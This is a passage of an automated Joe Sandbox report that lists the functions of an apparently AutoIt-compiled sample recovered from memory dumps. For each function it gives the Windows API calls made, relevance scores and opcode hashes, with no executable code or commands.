                                          • Part of subcall function 0078AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0078AF8E
                                          • Part of subcall function 0078B736: GetCursorPos.USER32(000000FF), ref: 0078B749
                                          • Part of subcall function 0078B736: ScreenToClient.USER32(00000000,000000FF), ref: 0078B766
                                          • Part of subcall function 0078B736: GetAsyncKeyState.USER32(00000001), ref: 0078B78B
                                          • Part of subcall function 0078B736: GetAsyncKeyState.USER32(00000002), ref: 0078B799
                                        • NtdllDialogWndProc_W.NTDLL(?,00000204,?,?,00000001,?,?,?,007EF417,?,?,?,?,?,00000001,?), ref: 007DEA9C
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: AsyncState$ClientCursorDialogLongNtdllProc_ScreenWindow
                                        • String ID:
                                        • API String ID: 2356834413-0
                                        • Opcode ID: b512aff3022b6070f28b5b42e599cdd8e3a2f8c843039d78cc80b8a2784e8d2a
                                        • Instruction ID: e6bfe08534705978b38a84948912e88a59b728ba0f527d01809e04017f46a2c3
                                        • Opcode Fuzzy Hash: b512aff3022b6070f28b5b42e599cdd8e3a2f8c843039d78cc80b8a2784e8d2a
                                        • Instruction Fuzzy Hash: 39F08231100219EBDF157F15CC09ABA3B61FB40750F404016F9061A191D77A9865DBD5
                                        Function 0078B7F2 Relevance: 1.5, APIs: 1, Instructions: 28nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0078AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0078AF8E
                                        • NtdllDialogWndProc_W.NTDLL(?,00000006,?,?,?,?,0078AF40,?,?,?,?,?), ref: 0078B83B
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: DialogLongNtdllProc_Window
                                        • String ID:
                                        • API String ID: 2065330234-0
                                        • Opcode ID: b724c92ffca261cb09a955f270ef1ad53cf015b5d8ccc8a7d3bbb6a909e3843f
                                        • Instruction ID: e7d82e30bd82c21588c1ea8ffffa9317659e26d30f2e1dc14197a9755012659b
                                        • Opcode Fuzzy Hash: b724c92ffca261cb09a955f270ef1ad53cf015b5d8ccc8a7d3bbb6a909e3843f
                                        • Instruction Fuzzy Hash: E3F08234600209DFDF18EF15D8989353BA6FB85760F108A39F9524B2A0D775DC60DB94
                                        Function 007C703C Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                        Download Yara Rule
                                        APIs
                                        • BlockInput.USER32(00000001), ref: 007C7057
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: BlockInput
                                        • String ID:
                                        • API String ID: 3456056419-0
                                        • Opcode ID: a8deaf0320f8b4eb832ca649782f400aa564638ebf27166ff5959dcd9cfb040a
                                        • Instruction ID: 77fa858e7d1034e05a05b06341c3fe3b1f1c5aba5dc4e3cb166be31a9363c8e3
                                        • Opcode Fuzzy Hash: a8deaf0320f8b4eb832ca649782f400aa564638ebf27166ff5959dcd9cfb040a
                                        • Instruction Fuzzy Hash: 8DE012352442049FC710EFA9D408E96B7DD9F58751F00C42EA945D7251DAB4E8408B90
                                        Function 007DF3DA Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtdllDialogWndProc_W.NTDLL(?,00000232,?,?), ref: 007DF41A
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: DialogNtdllProc_
                                        • String ID:
                                        • API String ID: 3239928679-0
                                        • Opcode ID: 5a904755d2e1623c0278a1078d8e78747163e08bacd5524eff4ef161853807c8
                                        • Instruction ID: a48d1b99a780da0d4ce6f1b04e1d847968dfa8df98da483f677606899208a7fe
                                        • Opcode Fuzzy Hash: 5a904755d2e1623c0278a1078d8e78747163e08bacd5524eff4ef161853807c8
                                        • Instruction Fuzzy Hash: 9BF06D31200289EFDF21EF58DC09FD67BA5FB05760F048469FA15672E1CB74A820D7A8
                                        Function 0078AC99 Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0078AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0078AF8E
                                        • NtdllDialogWndProc_W.NTDLL(?,00000007,?,00000000,00000000,?,?), ref: 0078ACC7
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: DialogLongNtdllProc_Window
                                        • String ID:
                                        • API String ID: 2065330234-0
                                        • Opcode ID: 47f19659b575ab27b155178a92ad87e5705e4a07dd394df56ec500b6a2d7b083
                                        • Instruction ID: 94154650616978c701fca296978f57a0d92e46f38bb053467959487a49695461
                                        • Opcode Fuzzy Hash: 47f19659b575ab27b155178a92ad87e5705e4a07dd394df56ec500b6a2d7b083
                                        • Instruction Fuzzy Hash: 62E01235140208FBDF15BF90DC59E643B26FB89754F108429F6054B6A1CB37E922EB55
                                        Function 007DF425 Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtdllDialogWndProc_W.NTDLL(?,00000053,?,?,?,007EF3D4,?,?,?,?,?,?), ref: 007DF450
                                          • Part of subcall function 007DE13E: _memset.LIBCMT ref: 007DE14D
                                          • Part of subcall function 007DE13E: _memset.LIBCMT ref: 007DE15C
                                          • Part of subcall function 007DE13E: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00833EE0,00833F24), ref: 007DE18B
                                          • Part of subcall function 007DE13E: CloseHandle.KERNEL32 ref: 007DE19D
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: _memset$CloseCreateDialogHandleNtdllProc_Process
                                        • String ID:
                                        • API String ID: 2364484715-0
                                        • Opcode ID: b3552c59289debea0170bb50ae46f3baa806a45bc7abb245012c185b272479db
                                        • Instruction ID: d812640cb92d00fad477762675435a817bc1487add4f1737f17f15d962a36350
                                        • Opcode Fuzzy Hash: b3552c59289debea0170bb50ae46f3baa806a45bc7abb245012c185b272479db
                                        • Instruction Fuzzy Hash: 2BE09231210249DFCB11AF58DC49E9A37B6FB08750F018066FA055B2B1C775A961EF55
                                        Function 007DF37C Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtdllDialogWndProc_W.NTDLL ref: 007DF3A1
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: DialogNtdllProc_
                                        • String ID:
                                        • API String ID: 3239928679-0
                                        • Opcode ID: 3645c948912b53f2843f29f49171c18663351b4f8f76b4b42e7824a66fc54498
                                        • Instruction ID: fe26c9468bd7c62ae81d921ce32648976a2b8d94407e5c79b0e005ae12b6dd1e
                                        • Opcode Fuzzy Hash: 3645c948912b53f2843f29f49171c18663351b4f8f76b4b42e7824a66fc54498
                                        • Instruction Fuzzy Hash: 5FE0E23420420CEFCB01EF88D848E963BA5FB5A350F004054FD048B261C771A830EB61
                                        Function 007DF3AB Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtdllDialogWndProc_W.NTDLL ref: 007DF3D0
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: DialogNtdllProc_
                                        • String ID:
                                        • API String ID: 3239928679-0
                                        • Opcode ID: f8c723e58f5a03e78776a59cd7d78fb317fd20526da7c9be13b8d7acf97a6626
                                        • Instruction ID: 01e0ededcbe42297f8597a000b9a6806a9fcdafb7eeec38c0e8d9623e6e00358
                                        • Opcode Fuzzy Hash: f8c723e58f5a03e78776a59cd7d78fb317fd20526da7c9be13b8d7acf97a6626
                                        • Instruction Fuzzy Hash: 27E0173420020CEFCB01EF88D848E963BA5FB5A350F004054FD048B362C772E830EBA1
                                        Function 0078B845 Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0078AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0078AF8E
                                          • Part of subcall function 0078B86E: DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0078B85B), ref: 0078B926
                                          • Part of subcall function 0078B86E: KillTimer.USER32(00000000,?,?,?,?,0078B85B,00000000,?,?,0078AF1E,?,?), ref: 0078B9BD
                                        • NtdllDialogWndProc_W.NTDLL(?,00000002,00000000,00000000,00000000,?,?,0078AF1E,?,?), ref: 0078B864
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Window$DestroyDialogKillLongNtdllProc_Timer
                                        • String ID:
                                        • API String ID: 2797419724-0
                                        • Opcode ID: dacf5353136c87d7c5d570d157f1b1f3bb9c6cfd702bb3dbc54f7757796b49e2
                                        • Instruction ID: 096a2a89df0b9e36c1f95a702410274c1c46b017feebc7e76018802b144fe78e
                                        • Opcode Fuzzy Hash: dacf5353136c87d7c5d570d157f1b1f3bb9c6cfd702bb3dbc54f7757796b49e2
                                        • Instruction Fuzzy Hash: FCD0127118430CF7DF103BA1DC0FF597A1EEB45B50F408431F7056A1E18A75A820A699
                                        Function 00798E19 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                        Download Yara Rule
                                        APIs
                                        • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00798E1F
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: ExceptionFilterUnhandled
                                        • String ID:
                                        • API String ID: 3192549508-0
                                        • Opcode ID: ae25e6b456fd9e58c0fda83d47ed9ecd72fd8989f87d83b36e7a0a9d15b32938
                                        • Instruction ID: 67804a9dd2403e5228be8ab2633f3067b1b6773e0a3e20409303651985127338
                                        • Opcode Fuzzy Hash: ae25e6b456fd9e58c0fda83d47ed9ecd72fd8989f87d83b36e7a0a9d15b32938
                                        • Instruction Fuzzy Hash: 4AA0123000450CE78B001B51EC044587F5DDA051507008010F50C00021873358108585
                                        Function 0079A937 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.KERNEL32(00796AE9,008267D8,00000014), ref: 0079A937
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: HeapProcess
                                        • String ID:
                                        • API String ID: 54951025-0
                                        • Opcode ID: 45853190535495e5235a169b0bd4244f9411baabdbcfce89b2b60ce8d34e0c2d
                                        • Instruction ID: a2e9144dc2e1622e79e5cc832c171e6b6c69d84d12a8535bb10ded8d53494918
                                        • Opcode Fuzzy Hash: 45853190535495e5235a169b0bd4244f9411baabdbcfce89b2b60ce8d34e0c2d
                                        • Instruction Fuzzy Hash: 11B012B0303102CBDB084B38AC6422E3FD56789101302807D7403C2960DB30C810DF00
                                        Function 00790EC4 Relevance: .3, Instructions: 345COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                        • Instruction ID: afd082c0dec34f025276631ece7d3799c732ded6a435a5ce18e5ea07949a883f
                                        • Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                        • Instruction Fuzzy Hash: ABC1C5722151934DDF2D863EE43443EFBA19AA27B131A476DD8B3CB4C4EE28C974D690
                                        Function 007912F9 Relevance: .3, Instructions: 341COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                        • Instruction ID: 03cef61bb4a976f1106819f767e77c9b3c7b79985560e6b0fb59b90b5744baf5
                                        • Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                        • Instruction Fuzzy Hash: 87C109722051934EDF2D8639D43443EBAA19AA27B131B476DD8B3CB5D0EE28C974D6A0
                                        Function 00790A8F Relevance: .3, Instructions: 331COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                        • Instruction ID: 4da7392876995641748873d795d22decd332392b1ba5ab8aca207dfc352b9745
                                        • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                        • Instruction Fuzzy Hash: A2C1F7722251934DDF2D8639D43443EFBA19EA27B530A476DD8B3CB0C0EE28C964D6E0
                                        Function 00790677 Relevance: .3, Instructions: 323COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                        • Instruction ID: fe64bfc272d13a6a9538bab42335cbeecf4a2c2d8ca4efacf8de2d85b11b6746
                                        • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                        • Instruction Fuzzy Hash: BCC1F5722151934DDF2D8639E43443EFBA19EA27B130A476DD8B3CB4C1EE28D964D6E0
                                        Function 007CA750 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 490filecommemoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • DeleteObject.GDI32(00000000), ref: 007CA7A5
                                        • DeleteObject.GDI32(00000000), ref: 007CA7B7
                                        • DestroyWindow.USER32 ref: 007CA7C5
                                        • GetDesktopWindow.USER32 ref: 007CA7DF
                                        • GetWindowRect.USER32(00000000), ref: 007CA7E6
                                        • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 007CA927
                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 007CA937
                                        • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007CA97F
                                        • GetClientRect.USER32(00000000,?), ref: 007CA98B
                                        • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 007CA9C5
                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007CA9E7
                                        • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007CA9FA
                                        • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007CAA05
                                        • GlobalLock.KERNEL32(00000000), ref: 007CAA0E
                                        • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007CAA1D
                                        • GlobalUnlock.KERNEL32(00000000), ref: 007CAA26
                                        • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007CAA2D
